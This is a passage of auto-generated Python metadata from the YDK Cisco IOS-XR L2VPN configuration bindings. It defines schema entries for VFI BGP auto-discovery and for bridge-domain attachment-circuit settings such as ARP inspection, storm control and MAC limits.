'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets',
False,
[
_MetaInfoClassMember('route-target', REFERENCE_LIST, 'RouteTarget' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget',
[], [],
''' Name of the Route Target
''',
'route_target',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'route-targets',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery',
False,
[
_MetaInfoClassMember('ad-control-word', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable control-word for this VFI
''',
'ad_control_word',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bgp-route-policy', REFERENCE_CLASS, 'BgpRoutePolicy' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpRoutePolicy',
[], [],
''' Route policy
''',
'bgp_route_policy',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bgp-signaling-protocol', REFERENCE_CLASS, 'BgpSignalingProtocol' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol',
[], [],
''' Enable Signaling Protocol BGP in this
VFI
''',
'bgp_signaling_protocol',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Autodiscovery BGP
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ldp-signaling-protocol', REFERENCE_CLASS, 'LdpSignalingProtocol' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol',
[], [],
''' Signaling Protocol LDP in this VFI
configuration
''',
'ldp_signaling_protocol',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('route-distinguisher', REFERENCE_CLASS, 'RouteDistinguisher' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteDistinguisher',
[], [],
''' Route Distinguisher
''',
'route_distinguisher',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('route-targets', REFERENCE_CLASS, 'RouteTargets' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets',
[], [],
''' Route Target
''',
'route_targets',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('table-policy', ATTRIBUTE, 'str' , None, None,
[], [],
''' Table Policy for installation of
forwarding data to L2FIB
''',
'table_policy',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bgp-auto-discovery',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
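        # Aggregate 'vfi' entry: keyed by name (0..32 characters), bundling BGP
        # auto-discovery, multicast P2MP, the pseudowire list, shutdown, and an
        # optional VPN identifier in 1..4294967295.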
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the Virtual Forwarding Interface
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bgp-auto-discovery', REFERENCE_CLASS, 'BgpAutoDiscovery' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery',
[], [],
''' Enable Autodiscovery BGP in this VFI
''',
'bgp_auto_discovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('multicast-p2mp', REFERENCE_CLASS, 'MulticastP2Mp' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp',
[], [],
''' Enable Multicast P2MP in this VFI
''',
'multicast_p2mp',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-pseudowires', REFERENCE_CLASS, 'VfiPseudowires' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires',
[], [],
''' List of pseudowires
''',
'vfi_pseudowires',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-shutdown', ATTRIBUTE, 'Empty' , None, None,
[], [],
                ''' Enable Shutdown
''',
'vfi_shutdown',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vpnid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' VPN Identifier
''',
'vpnid',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vfi',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis',
False,
[
_MetaInfoClassMember('vfi', REFERENCE_LIST, 'Vfi' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi',
[], [],
''' Name of the Virtual Forwarding Interface
''',
'vfi',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vfis',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
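        # Bridge-domain attachment-circuit subtree: the entries that follow define
        # per-interface controls (IP source guard, dynamic ARP inspection, DHCP
        # profile, storm control, split horizon, static and dynamic MAC handling).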
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceIpSourceGuard' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceIpSourceGuard',
False,
[
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable L2 Interface Dynamic IP source
guard
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable IP Source Guard
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' Logging Type
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-ip-source-guard',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai.InterfaceDaiAddressValidation' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai.InterfaceDaiAddressValidation',
False,
[
_MetaInfoClassMember('destination-mac-verification', REFERENCE_ENUM_CLASS, 'L2VpnVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnVerificationEnum',
[], [],
''' Destination MAC Verification
''',
'destination_mac_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Address Validation
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ipv4-verification', REFERENCE_ENUM_CLASS, 'L2VpnVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnVerificationEnum',
[], [],
''' IPv4 Verification
''',
'ipv4_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-mac-verification', REFERENCE_ENUM_CLASS, 'L2VpnVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnVerificationEnum',
[], [],
''' Source MAC Verification
''',
'source_mac_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-dai-address-validation',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai',
False,
[
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable L2 Interface Dynamic ARP
Inspection
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable L2 Interface Dynamic ARP
Inspection
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-dai-address-validation', REFERENCE_CLASS, 'InterfaceDaiAddressValidation' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai.InterfaceDaiAddressValidation',
[], [],
''' Address Validation
''',
'interface_dai_address_validation',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' Logging Type
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-dai',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceProfile' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceProfile',
False,
[
_MetaInfoClassMember('dhcp-snooping-id', ATTRIBUTE, 'str' , None, None,
[], [],
''' Disable DHCP snooping
''',
'dhcp_snooping_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('profile-id', REFERENCE_ENUM_CLASS, 'InterfaceProfileEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceProfileEnum',
[], [],
''' Set the snooping profile
''',
'profile_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-profile',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
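        # Storm-control units: a rate is given either in packets per second
        # (1..160000) or kilobits per second (64..1280000); per the member
        # descriptions below, the two units cannot be configured together.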
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType.StormControlUnit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType.StormControlUnit',
False,
[
_MetaInfoClassMember('kbits-per-sec', ATTRIBUTE, 'int' , None, None,
[('64', '1280000')], [],
                ''' Kilobits Per Second; PktsPerSec and KbitsPerSec
                cannot be configured together
''',
'kbits_per_sec',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pkts-per-sec', ATTRIBUTE, 'int' , None, None,
[('1', '160000')], [],
                ''' Packets Per Second; PktsPerSec and KbitsPerSec
                cannot be configured together
''',
'pkts_per_sec',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'storm-control-unit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType',
False,
[
_MetaInfoClassMember('sctype', REFERENCE_ENUM_CLASS, 'StormControlEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'StormControlEnum',
[], [],
''' Storm Control Type
''',
'sctype',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('storm-control-unit', REFERENCE_CLASS, 'StormControlUnit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType.StormControlUnit',
[], [],
''' Specify units for Storm Control Configuration
''',
'storm_control_unit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bdac-storm-control-type',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes',
False,
[
_MetaInfoClassMember('bdac-storm-control-type', REFERENCE_LIST, 'BdacStormControlType' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType',
[], [],
''' Storm Control Type
''',
'bdac_storm_control_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bdac-storm-control-types',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon.SplitHorizonGroupId' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon.SplitHorizonGroupId',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable split horizon group
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'split-horizon-group-id',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon',
False,
[
_MetaInfoClassMember('split-horizon-group-id', REFERENCE_CLASS, 'SplitHorizonGroupId' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon.SplitHorizonGroupId',
[], [],
''' Split Horizon Group ID
''',
'split_horizon_group_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'split-horizon',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses.StaticMacAddress' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses.StaticMacAddress',
False,
[
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Static MAC address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'static-mac-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses',
False,
[
_MetaInfoClassMember('static-mac-address', REFERENCE_LIST, 'StaticMacAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses.StaticMacAddress',
[], [],
''' Static Mac Address Configuration
''',
'static_mac_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'static-mac-addresses',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
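        # Per-interface MAC subtree: aging (time constrained to 300..30000 plus an
        # aging-type enum), secure mode with an enforcement action and logging, and
        # a MAC limit with action, notification, and a 0..4294967295 maximum.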
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacAging' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacAging',
False,
[
_MetaInfoClassMember('interface-mac-aging-time', ATTRIBUTE, 'int' , None, None,
[('300', '30000')], [],
''' Mac Aging Time
''',
'interface_mac_aging_time',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-aging-type', REFERENCE_ENUM_CLASS, 'MacAgingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacAgingEnum',
[], [],
''' MAC address aging type
''',
'interface_mac_aging_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-mac-aging',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacSecure' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacSecure',
False,
[
_MetaInfoClassMember('action', REFERENCE_ENUM_CLASS, 'MacSecureActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacSecureActionEnum',
[], [],
''' MAC secure enforcement action
''',
'action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable L2 Interface MAC Secure
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable MAC Secure
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' MAC Secure Logging
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-mac-secure',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacLimit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacLimit',
False,
[
_MetaInfoClassMember('interface-mac-limit-action', REFERENCE_ENUM_CLASS, 'MacLimitActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLimitActionEnum',
[], [],
''' Interface MAC address limit enforcement
action
''',
'interface_mac_limit_action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-limit-max', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Number of MAC addresses on an Interface
after which MAC limit action is taken
''',
'interface_mac_limit_max',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-limit-notif', REFERENCE_ENUM_CLASS, 'MacNotificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacNotificationEnum',
[], [],
''' MAC address limit notification action
                in an Interface
''',
'interface_mac_limit_notif',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-mac-limit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac',
False,
[
_MetaInfoClassMember('interface-mac-aging', REFERENCE_CLASS, 'InterfaceMacAging' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacAging',
[], [],
''' MAC-Aging configuration commands
''',
'interface_mac_aging',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-learning', REFERENCE_ENUM_CLASS, 'MacLearnEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLearnEnum',
[], [],
''' Enable Mac Learning
''',
'interface_mac_learning',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-limit', REFERENCE_CLASS, 'InterfaceMacLimit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacLimit',
[], [],
''' MAC-Limit configuration commands
''',
'interface_mac_limit',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-port-down-flush', REFERENCE_ENUM_CLASS, 'PortDownFlushEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'PortDownFlushEnum',
[], [],
''' Enable/Disable MAC Flush When Port goes
down
''',
'interface_mac_port_down_flush',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-secure', REFERENCE_CLASS, 'InterfaceMacSecure' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacSecure',
[], [],
''' MAC Secure
''',
'interface_mac_secure',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-mac',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
